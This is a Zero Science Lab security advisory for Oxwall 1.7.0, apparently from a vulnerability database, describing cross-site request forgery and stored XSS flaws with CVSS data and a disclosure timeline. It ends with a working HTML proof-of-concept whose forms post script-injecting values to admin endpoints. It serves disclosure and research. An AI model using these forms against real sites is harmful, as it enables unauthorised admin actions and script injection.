CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
AI Score
Confidence
High
EPSS
Percentile
85.5%
Title: Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities
Advisory ID: ZSL-2014-5195
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 28.07.2014
Oxwall is unbelievably flexible and easy to use PHP/MySQL social networking software platform.
Oxwall version 1.7.0 suffers from multiple cross-site request forgery and stored xss vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
Oxwall Software Foundation - <http://www.oxwall.org>
1.7.0 (build 7907 and 7906)
Kali Linux 3.7-trunk-686-pae
Apache/2.2.22 (Debian)
PHP 5.4.4-13(apache2handler)
MySQL 5.5.28
[18.07.2014] Vulnerabilities discovered.
[18.07.2014] Vendor contacted.
[20.07.2014] No reply from the vendor.
[21.07.2014] Vendor contacted again.
[23.07.2014] Reminded vendor on twitter to check their e-mails.
[23.07.2014] No reply from the vendor whatsoever.
[23.07.2014] Created a forum account and contacted the vendor there.
[24.07.2014] Vendor responds on the forum post asking more details.
[24.07.2014] Informed the vendor to conference via e-mail.
[25.07.2014] Vendor responds on the e-mails sent previously, asking more details.
[25.07.2014] Sent detailed information to the vendor.
[27.07.2014] Asked vendor for status update.
[27.07.2014] No reply from the vendor.
[28.07.2014] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://packetstormsecurity.com/files/127652>
[2] <http://www.exploit-db.com/exploits/34190/>
[3] <http://cxsecurity.com/issue/WLB-2014070155>
[4] <http://osvdb.org/show/osvdb/109622>
[5] <http://osvdb.org/show/osvdb/109623>
[6] <http://osvdb.org/show/osvdb/109624>
[7] <http://osvdb.org/show/osvdb/109625>
[8] <http://sebug.net/vuldb/ssvid-87164>
[9] <http://www.securityfocus.com/bid/68938>
[10] <http://secunia.com/advisories/59720/>
[11] <http://xforce.iss.net/xforce/xfdb/94907>
[12] <http://xforce.iss.net/xforce/xfdb/94908>
[13] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9101>
[14] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9101>
[28.07.2014] - Initial release
[29.07.2014] - Added reference [1], [2], [3], [4], [5], [6] and [7]
[30.07.2014] - Added reference [8] and [9]
[05.10.2014] - Added reference [10] and [11]
[20.10.2014] - Added reference [12]
[02.12.2014] - Added reference [13] and [14]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities
Vendor: Oxwall Software Foundation
Product web page: http://www.oxwall.org
Affected version: 1.7.0 (build 7907 and 7906)
Summary: Oxwall is unbelievably flexible and easy to use
PHP/MySQL social networking software platform.
Desc: Oxwall version 1.7.0 suffers from multiple cross-site
request forgery and stored xss vulnerabilities. The application
allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Input passed to several POST parameters is not properly
sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Kali Linux 3.7-trunk-686-pae
Apache/2.2.22 (Debian)
PHP 5.4.4-13(apache2handler)
MySQL 5.5.28
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5195
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php
18.07.2014
--><html>
<head><title>Oxwall 1.7.0 Multiple CSRF And Stored XSS Vulnerabilities</title>
</head><body>
<form action="http://192.168.0.105/admin/users/roles/" method="POST">
<input name="form_name" type="hidden" value="add-role"/>
<input name="label" type="hidden" value='"><script>alert(1);</script>'/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="Execute #1"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6"/>
<input name="command" type="hidden" value="AddAccountType"/>
<input name="key" type="hidden" value="questions_account_type_5615100a931845eca8da20cfdf7327e0"/>
<input name="prefix" type="hidden" value="base"/>
<input name="accountTypeName" type="hidden" value="5615100a931845eca8da20cfdf7327e0"/>
<input name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" type="hidden" value='"><script>alert(2);</script>'/>
<input name="role" type="hidden" value="12"/>
<input type="submit" value="Execute #2"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="qst_add_form"/>
<input name="qst_name" type="hidden" value='"><script>alert(3);</script>'/>
<input name="qst_description" type="hidden" value="ZSL"/>
<input name="qst_account_type[0]" type="hidden" value="290365aadde35a97f11207ca7e4279cc"/>
<input name="qst_section" type="hidden" value="f90cde5913235d172603cc4e7b9726e3"/>
<input name="qst_answer_type" type="hidden" value="text"/>
<input name="qst_possible_values" type="hidden" value="%5B%5D"/>
<input name="year_range[to]" type="hidden" value="1996"/>
<input name="year_range[from]" type="hidden" value="1930"/>
<input name="qst_column_count" type="hidden" value="1"/>
<input name="qst_required" type="hidden" value=""/>
<input name="qst_on_sign_up" type="hidden" value=""/>
<input name="qst_on_edit" type="hidden" value=""/>
<input name="qst_on_view" type="hidden" value=""/>
<input name="qst_on_search" type="hidden" value=""/>
<input name="valuesStorage" type="hidden" value="%7B%7D"/>
<input name="command" type="hidden" value="addQuestion"/>
<input type="submit" value="Execute #3"/>
</form>
<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
<input name="form_name" type="hidden" value='restrictedUsernamesForm"><script>alert(4);</script>'/>
<input name="restrictedUsername" type="hidden" value='"><script>alert(5);</script>'/>
<input name="addUsername" type="hidden" value="Add"/>
<input type="submit" value="Execute #4 & #5"/>
</form>
</body>
</html>